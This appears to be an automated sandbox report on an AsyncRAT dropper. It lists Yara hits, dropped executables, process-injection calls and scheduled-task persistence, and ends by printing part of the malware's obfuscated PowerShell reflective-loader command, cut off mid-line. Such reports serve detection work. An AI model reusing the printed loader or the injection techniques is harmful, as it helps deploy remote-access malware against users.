Source: C:\Users\Public\DeadROOTkit.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

Operating System Destruction
barindex
Protects its processes via BreakOnTermination flag
Source: C:\Users\Public\DeadROOTkit.exe Process information set: 01 00 00 00 Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.0.DeadXClient.exe.680000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\Public\DeadXClient.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\Public\Deadsvchost.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
.NET source code contains very large strings
Source: mIURiU8n2P.exe, -Program-.cs Long String: Length: 253952
Contains functionality to call native functions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7F0C4D NtWriteVirtualMemory, 4_2_00007FFD9B7F0C4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7F0FD4 NtResumeThread, 4_2_00007FFD9B7F0FD4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7F0F10 NtSetContextThread, 4_2_00007FFD9B7F0F10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7F0A2E NtUnmapViewOfSection, 4_2_00007FFD9B7F0A2E
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_0000000140001854 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 6_2_0000000140001854
Source: C:\Windows\System32\winlogon.exe Code function: 11_2_00000225DC6429B0 NtEnumerateValueKey,NtEnumerateValueKey, 11_2_00000225DC6429B0
Source: C:\Windows\System32\lsass.exe Code function: 12_2_00000202C0AE2618 NtQueryDirectoryFileEx,GetFileType,StrCpyW, 12_2_00000202C0AE2618
Source: C:\Windows\System32\lsass.exe Code function: 12_2_00000202C0AE2118 NtQuerySystemInformation,StrCmpNIW, 12_2_00000202C0AE2118
Source: C:\Windows\System32\dwm.exe Code function: 16_2_000002BAAF2129B0 NtEnumerateValueKey,NtEnumerateValueKey, 16_2_000002BAAF2129B0
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\System32\Tasks\DeadROOTkit
Deletes files inside the Windows folder
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_qnblsrzc.xue.ps1 Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Code function: 0_2_00007FFD9B800C11 0_2_00007FFD9B800C11
Source: C:\Users\Public\DeadXClient.exe Code function: 1_2_00007FFD9B7F6F66 1_2_00007FFD9B7F6F66
Source: C:\Users\Public\DeadXClient.exe Code function: 1_2_00007FFD9B7F7D12 1_2_00007FFD9B7F7D12
Source: C:\Users\Public\DeadXClient.exe Code function: 1_2_00007FFD9B7F0E79 1_2_00007FFD9B7F0E79
Source: C:\Users\Public\DeadXClient.exe Code function: 1_2_00007FFD9B7F1799 1_2_00007FFD9B7F1799
Source: C:\Users\Public\DeadROOTkit.exe Code function: 2_2_00007FFD9B8012E9 2_2_00007FFD9B8012E9
Source: C:\Users\Public\DeadROOTkit.exe Code function: 2_2_00007FFD9B805F06 2_2_00007FFD9B805F06
Source: C:\Users\Public\DeadROOTkit.exe Code function: 2_2_00007FFD9B8021D1 2_2_00007FFD9B8021D1
Source: C:\Users\Public\DeadROOTkit.exe Code function: 2_2_00007FFD9B806CB2 2_2_00007FFD9B806CB2
Source: C:\Users\Public\DeadROOTkit.exe Code function: 2_2_00007FFD9B8046DD 2_2_00007FFD9B8046DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7EF649 4_2_00007FFD9B7EF649
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7EB2FA 4_2_00007FFD9B7EB2FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7EE319 4_2_00007FFD9B7EE319
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7EFDD9 4_2_00007FFD9B7EFDD9
Source: C:\Windows\System32\dllhost.exe Code function: 6_3_000002E86A06F418 6_3_000002E86A06F418
Source: C:\Windows\System32\dllhost.exe Code function: 6_3_000002E86A06B150 6_3_000002E86A06B150
Source: C:\Windows\System32\dllhost.exe Code function: 6_3_000002E86A06B35C 6_3_000002E86A06B35C
Source: C:\Windows\System32\dllhost.exe Code function: 6_3_000002E86A071778 6_3_000002E86A071778
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_0000000140001CDC 6_2_0000000140001CDC
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_0000000140002D54 6_2_0000000140002D54
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_0000000140002430 6_2_0000000140002430
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_00000001400031D8 6_2_00000001400031D8
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_0000000140001274 6_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_000002E86A0A0018 6_2_000002E86A0A0018
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_000002E86A09BD50 6_2_000002E86A09BD50
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_000002E86A09BF5C 6_2_000002E86A09BF5C
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_000002E86A0A2378 6_2_000002E86A0A2378
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B8A30E9 7_2_00007FFD9B8A30E9
Source: C:\Windows\System32\winlogon.exe Code function: 11_3_00000225DC621778 11_3_00000225DC621778
Source: C:\Windows\System32\winlogon.exe Code function: 11_3_00000225DC61B35C 11_3_00000225DC61B35C
Source: C:\Windows\System32\winlogon.exe Code function: 11_3_00000225DC61F418 11_3_00000225DC61F418
Source: C:\Windows\System32\winlogon.exe Code function: 11_3_00000225DC61B150 11_3_00000225DC61B150
Source: C:\Windows\System32\winlogon.exe Code function: 11_2_00000225DC652378 11_2_00000225DC652378
Source: C:\Windows\System32\winlogon.exe Code function: 11_2_00000225DC64BF5C 11_2_00000225DC64BF5C
Source: C:\Windows\System32\winlogon.exe Code function: 11_2_00000225DC650018 11_2_00000225DC650018
Source: C:\Windows\System32\winlogon.exe Code function: 11_2_00000225DC64BD50 11_2_00000225DC64BD50
Source: C:\Windows\System32\lsass.exe Code function: 12_3_00000202C0AC1778 12_3_00000202C0AC1778
Source: C:\Windows\System32\lsass.exe Code function: 12_3_00000202C0ABB35C 12_3_00000202C0ABB35C
Source: C:\Windows\System32\lsass.exe Code function: 12_3_00000202C0ABF418 12_3_00000202C0ABF418
Source: C:\Windows\System32\lsass.exe Code function: 12_3_00000202C0ABB150 12_3_00000202C0ABB150
Source: C:\Windows\System32\lsass.exe Code function: 12_2_00000202C0AF2378 12_2_00000202C0AF2378
Source: C:\Windows\System32\lsass.exe Code function: 12_2_00000202C0AEBF5C 12_2_00000202C0AEBF5C
Source: C:\Windows\System32\lsass.exe Code function: 12_2_00000202C0AF0018 12_2_00000202C0AF0018
Source: C:\Windows\System32\lsass.exe Code function: 12_2_00000202C0AEBD50 12_2_00000202C0AEBD50
Source: C:\Users\Public\Deadsvchost.exe Code function: 13_2_00007FFD9B800E79 13_2_00007FFD9B800E79
Source: C:\Users\Public\Deadsvchost.exe Code function: 13_2_00007FFD9B801799 13_2_00007FFD9B801799
Source: C:\Windows\System32\svchost.exe Code function: 14_3_000002A6612DB35C 14_3_000002A6612DB35C
Source: C:\Windows\System32\svchost.exe Code function: 14_3_000002A6612E1778 14_3_000002A6612E1778
Source: C:\Windows\System32\svchost.exe Code function: 14_3_000002A6612DB150 14_3_000002A6612DB150
Source: C:\Windows\System32\svchost.exe Code function: 14_3_000002A6612DF418 14_3_000002A6612DF418
Source: C:\Windows\System32\svchost.exe Code function: 14_2_000002A66130BF5C 14_2_000002A66130BF5C
Source: C:\Windows\System32\svchost.exe Code function: 14_2_000002A661312378 14_2_000002A661312378
Source: C:\Windows\System32\svchost.exe Code function: 14_2_000002A66130BD50 14_2_000002A66130BD50
Source: C:\Windows\System32\svchost.exe Code function: 14_2_000002A661310018 14_2_000002A661310018
Source: C:\Windows\System32\dwm.exe Code function: 16_3_000002BAAF1F1778 16_3_000002BAAF1F1778
Source: C:\Windows\System32\dwm.exe Code function: 16_3_000002BAAF1EB35C 16_3_000002BAAF1EB35C
Source: C:\Windows\System32\dwm.exe Code function: 16_3_000002BAAF1EB150 16_3_000002BAAF1EB150
Source: C:\Windows\System32\dwm.exe Code function: 16_3_000002BAAF1EF418 16_3_000002BAAF1EF418
Source: C:\Windows\System32\dwm.exe Code function: 16_2_000002BAAF21BF5C 16_2_000002BAAF21BF5C
Source: C:\Windows\System32\dwm.exe Code function: 16_2_000002BAAF222378 16_2_000002BAAF222378
Source: C:\Windows\System32\dwm.exe Code function: 16_2_000002BAAF21BD50 16_2_000002BAAF21BD50
Source: C:\Windows\System32\dwm.exe Code function: 16_2_000002BAAF220018 16_2_000002BAAF220018
Source: C:\Windows\System32\svchost.exe Code function: 17_3_0000026A8799F418 17_3_0000026A8799F418
Source: C:\Windows\System32\svchost.exe Code function: 17_3_0000026A8799B35C 17_3_0000026A8799B35C
Source: C:\Windows\System32\svchost.exe Code function: 17_3_0000026A879A1778 17_3_0000026A879A1778
Source: C:\Windows\System32\svchost.exe Code function: 17_3_0000026A8799B150 17_3_0000026A8799B150
Source: C:\Windows\System32\svchost.exe Code function: 17_2_0000026A879D0018 17_2_0000026A879D0018
Source: C:\Windows\System32\svchost.exe Code function: 17_2_0000026A879CBF5C 17_2_0000026A879CBF5C
Source: C:\Windows\System32\svchost.exe Code function: 17_2_0000026A879D2378 17_2_0000026A879D2378
Source: C:\Windows\System32\svchost.exe Code function: 17_2_0000026A879CBD50 17_2_0000026A879CBD50
Source: C:\Windows\System32\svchost.exe Code function: 19_3_000001795377B150 19_3_000001795377B150
Source: C:\Windows\System32\svchost.exe Code function: 19_3_0000017953781778 19_3_0000017953781778
Source: C:\Windows\System32\svchost.exe Code function: 19_3_000001795377B35C 19_3_000001795377B35C
Source: C:\Windows\System32\svchost.exe Code function: 19_3_000001795377F418 19_3_000001795377F418
Source: C:\Windows\System32\svchost.exe Code function: 19_2_00000179537ABD50 19_2_00000179537ABD50
Source: C:\Windows\System32\svchost.exe Code function: 19_2_00000179537B2378 19_2_00000179537B2378
Source: C:\Windows\System32\svchost.exe Code function: 19_2_00000179537ABF5C 19_2_00000179537ABF5C
Source: C:\Windows\System32\svchost.exe Code function: 19_2_00000179537B0018 19_2_00000179537B0018
Source: C:\Windows\System32\svchost.exe Code function: 20_3_000002295D53B150 20_3_000002295D53B150
Source: C:\Windows\System32\svchost.exe Code function: 20_3_000002295D53F418 20_3_000002295D53F418
Source: C:\Windows\System32\svchost.exe Code function: 20_3_000002295D53B35C 20_3_000002295D53B35C
Source: C:\Windows\System32\svchost.exe Code function: 20_3_000002295D541778 20_3_000002295D541778
Source: C:\Windows\System32\svchost.exe Code function: 20_2_000002295D56BD50 20_2_000002295D56BD50
Source: C:\Windows\System32\svchost.exe Code function: 20_2_000002295D570018 20_2_000002295D570018
Source: C:\Windows\System32\svchost.exe Code function: 20_2_000002295D56BF5C 20_2_000002295D56BF5C
Source: C:\Windows\System32\svchost.exe Code function: 20_2_000002295D572378 20_2_000002295D572378
Found potential string decryption / allocating functions
Source: C:\Windows\System32\svchost.exe Code function: String function: 000002A6612E2770 appears 36 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 0000026A879A2770 appears 36 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 0000017953782770 appears 36 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 000002295D542770 appears 36 times
Source: C:\Windows\System32\winlogon.exe Code function: String function: 00000225DC622770 appears 36 times
Source: C:\Windows\System32\lsass.exe Code function: String function: 00000202C0AC2770 appears 36 times
Source: C:\Windows\System32\dllhost.exe Code function: String function: 000002E86A072770 appears 36 times
Source: C:\Windows\System32\dwm.exe Code function: String function: 000002BAAF1F2770 appears 36 times
PE file contains executable resources (Code or Archives)
Source: DeadCodeRootKit.exe.0.dr Static PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Sample file is different than original file name gathered from version info
Source: mIURiU8n2P.exe, 00000000.00000002.1704251593.000000001B256000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDeadXClient.exe4 vs mIURiU8n2P.exe
Source: mIURiU8n2P.exe, 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDeadXClient.exe4 vs mIURiU8n2P.exe
Source: mIURiU8n2P.exe, 00000000.00000002.1703998113.0000000012788000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDealarOrDeadCode.exe4 vs mIURiU8n2P.exe
Source: mIURiU8n2P.exe, 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDeadROOTkit.exe4 vs mIURiU8n2P.exe
Source: mIURiU8n2P.exe, 00000000.00000000.1663022110.00000000003F0000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameM6JR1IT3F6.exe4 vs mIURiU8n2P.exe
Source: mIURiU8n2P.exe Binary or memory string: OriginalFilenameM6JR1IT3F6.exe4 vs mIURiU8n2P.exe
Uses 32bit PE files
Source: mIURiU8n2P.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Very long command line found
Source: unknown Process created: Commandline size = 5531
Yara signature match
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.0.DeadXClient.exe.680000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\Public\DeadXClient.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\Public\Deadsvchost.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: DeadXClient.exe.0.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: DeadXClient.exe.0.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: DeadXClient.exe.0.dr, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: DeadROOTkit.exe.0.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: DeadROOTkit.exe.0.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: DeadROOTkit.exe.0.dr, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: Deadsvchost.exe.1.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: Deadsvchost.exe.1.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: DeadROOTkit.exe.0.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: DeadROOTkit.exe.0.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Deadsvchost.exe.1.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Deadsvchost.exe.1.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: DeadXClient.exe.0.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: DeadXClient.exe.0.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: DeadROOTkit.exe.2.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: DeadROOTkit.exe.2.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Microsoft-Windows-SMBServer%4Operational.evtx.25.dr Binary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Security.evtx.25.dr Binary string: \Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys\Ke
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.25.dr Binary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: System.evtx.25.dr Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe`
Source: Microsoft-Windows-SMBServer%4Operational.evtx.25.dr Binary string: \Device\NetbiosSmb
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.25.dr Binary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: System.evtx.25.dr Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.25.dr Binary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: System.evtx.25.dr Binary string: C:\Device\HarddiskVolume3`
Source: Security.evtx.25.dr Binary string: \Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.25.dr Binary string: A\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.25.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: System.evtx.25.dr Binary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeX
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.25.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.25.dr Binary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.25.dr Binary string: K\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.25.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}l
Source: Microsoft-Windows-SMBServer%4Operational.evtx.25.dr Binary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@27/83@5/4
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_0000000140002D54 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx, 6_2_0000000140002D54
Source: C:\Users\Public\DeadCodeRootKit.exe Code function: 3_2_00B01672 SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString, 3_2_00B01672
Source: C:\Users\Public\DeadCodeRootKit.exe Code function: 3_2_00B017A6 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW, 3_2_00B017A6
Source: C:\Users\user\Desktop\mIURiU8n2P.exe File created: C:\Users\Public\DeadXClient.exe Jump to behavior
Source: C:\Users\Public\Deadsvchost.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Mutant created: \Sessions\1\BaseNamedObjects\wxpsOI0qOWugh4cNc
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
Source: C:\Users\Public\DeadROOTkit.exe Mutant created: \Sessions\1\BaseNamedObjects\pPl3jDvgHvU1lllp
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3736:120:WilError_03
Source: C:\Users\Public\DeadXClient.exe Mutant created: \Sessions\1\BaseNamedObjects\tnsxJywWJMkQgZ7E
Source: C:\Users\Public\DeadROOTkit.exe File created: C:\Users\user\AppData\Local\Temp\Log.tmp Jump to behavior
Source: mIURiU8n2P.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: mIURiU8n2P.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\mIURiU8n2P.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: mIURiU8n2P.exe ReversingLabs: Detection: 73%
Source: mIURiU8n2P.exe Virustotal: Detection: 67%
Source: unknown Process created: C:\Users\user\Desktop\mIURiU8n2P.exe "C:\Users\user\Desktop\mIURiU8n2P.exe"
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process created: C:\Users\Public\DeadXClient.exe "C:\Users\Public\DeadXClient.exe"
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process created: C:\Users\Public\DeadROOTkit.exe "C:\Users\Public\DeadROOTkit.exe"
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process created: C:\Users\Public\DeadCodeRootKit.exe "C:\Users\Public\DeadCodeRootKit.exe"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bubCglTffNzZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QBDRAqnALMmwja,[Parameter(Position=1)][Type]$duQqlSyxSK)$pNdjVVbnfJT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pNdjVVbnfJT.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QBDRAqnALMmwja).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$pNdjVVbnfJT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'